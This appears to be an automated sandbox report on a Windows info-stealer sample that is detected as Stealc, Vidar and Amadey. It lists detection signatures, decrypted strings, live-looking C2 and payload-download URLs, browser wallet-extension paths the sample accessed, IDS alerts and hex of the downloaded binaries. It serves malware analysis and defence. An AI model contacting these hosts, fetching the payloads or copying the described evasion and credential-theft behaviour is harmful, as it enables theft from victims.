Windows Analysis Report
ukuWaeRgPR.exe

Overview

General Information

Sample name: ukuWaeRgPR.exe
renamed because original name is a hash value
Original sample name: 370e9decc41c2ed09ec8f40262b9e2f9.exe
Analysis ID: 1463763
MD5: 370e9decc41c2ed09ec8f40262b9e2f9
SHA1: 2d5753cb4b20e5ce6822ef8b96f8cbb38b2b393a
SHA256: 43d717f6aa2a1ae8bef569917f6ccb5adfd8bb965114196cc715d30e355268b4
Tags: 32exeStealctrojan
Infos:

Detection

Amadey, Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadeys stealer DLL
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: ukuWaeRgPR.exe Avira: detected
Antivirus detection for URL or domain
Source: http://85.28.47.4/a81-46d0-b6b6-535557bcc5fapN9U Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exe Avira URL Cloud: Label: malware
Source: http://85.28.47.4/ Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exe Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/nss3.dllT Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.php:9y Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.php) Avira URL Cloud: Label: malware
Source: http://85.28.47.4/pl Avira URL Cloud: Label: malware
Source: http://77.91.77.82/Hun4Ko/index.php Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/stealc/random.exe50673b5d7 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/920475a59bac849d.php1 Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.phpC9B Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll$ Avira URL Cloud: Label: malware
Source: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/mine/amadka.exephprefoxox Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/mine/amadka.exera Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/20475a59bac849d.php Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.phpi94 Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dlll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.phpFl Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exe00 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.php Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exepData Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dlly Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/stealc/random.exe Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exe00 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dllc Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4 Avira URL Cloud: Label: malware
Source: http://77.91.77.81/stealc/random.exeH Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/stealc/random.exe50673 Avira URL Cloud: Label: phishing
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amadka[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Found malware configuration
Source: 00000000.00000002.2171110129.0000000001FEE000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
Source: explorti.exe.2820.13.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php", "http://77.91.77.82/Hun4Ko/index.php"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe ReversingLabs: Detection: 47%
Multi AV Scanner detection for submitted file
Source: ukuWaeRgPR.exe ReversingLabs: Detection: 47%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amadka[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: ukuWaeRgPR.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetProcAddress
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: LoadLibraryA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: lstrcatA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: OpenEventA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: CreateEventA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: CloseHandle
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: Sleep
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: VirtualFree
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetSystemInfo
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: VirtualAlloc
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: HeapAlloc
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetComputerNameA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: lstrcpyA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetProcessHeap
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetCurrentProcess
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: lstrlenA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: ExitProcess
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetSystemTime
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: advapi32.dll
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: gdi32.dll
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: user32.dll
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: crypt32.dll
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: ntdll.dll
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetUserNameA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: CreateDCA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetDeviceCaps
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: ReleaseDC
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: sscanf
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: VMwareVMware
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: HAL9TH
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: JohnDoe
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: DISPLAY
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: %hu/%hu/%hu
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: http://85.28.47.4
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: /920475a59bac849d.php
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: /69934896f997d5bb/
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: default
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetFileAttributesA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GlobalLock
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: HeapFree
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetFileSize
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GlobalSize
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: IsWow64Process
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: Process32Next
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetLocalTime
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: FreeLibrary
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetVolumeInformationA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: Process32First
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetLocaleInfoA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetModuleFileNameA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: DeleteFileA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: FindNextFileA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: LocalFree
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: FindClose
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: LocalAlloc
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetFileSizeEx
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: ReadFile
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: SetFilePointer
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: WriteFile
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: CreateFileA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: FindFirstFileA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: CopyFileA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: VirtualProtect
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetLastError
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: lstrcpynA
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: MultiByteToWideChar
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GlobalFree
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: WideCharToMultiByte
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GlobalAlloc
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: OpenProcess
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: TerminateProcess
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: GetCurrentProcessId
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: gdiplus.dll
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: ole32.dll
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: bcrypt.dll
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: wininet.dll
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: shlwapi.dll
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: shell32.dll
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: psapi.dll
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: rstrtmgr.dll
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: SelectObject
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: BitBlt
Source: 0.2.ukuWaeRgPR.exe.c80000.0.unpack String decryptor: DeleteObject
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C326C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C326C80
Uses 32bit PE files
Source: ukuWaeRgPR.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: mozglue.pdbP source: ukuWaeRgPR.exe, 00000000.00000002.2210447818.000000006C38D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: ukuWaeRgPR.exe, 00000000.00000002.2212370303.000000006C54F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: ukuWaeRgPR.exe, 00000000.00000002.2212370303.000000006C54F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: ukuWaeRgPR.exe, 00000000.00000002.2210447818.000000006C38D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.5:49705 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.5:49705 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 85.28.47.4:80 -> 192.168.2.5:49705
Source: Traffic Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.5:49705 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 85.28.47.4:80 -> 192.168.2.5:49705
Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.5:49720 -> 77.91.77.82:80
Source: Traffic Snort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 77.91.77.82:80 -> 192.168.2.5:49720
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor URLs: http://85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor IPs: 77.91.77.82
Source: Malware configuration extractor IPs: 77.91.77.82
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 17:25:54 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 17:25:58 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 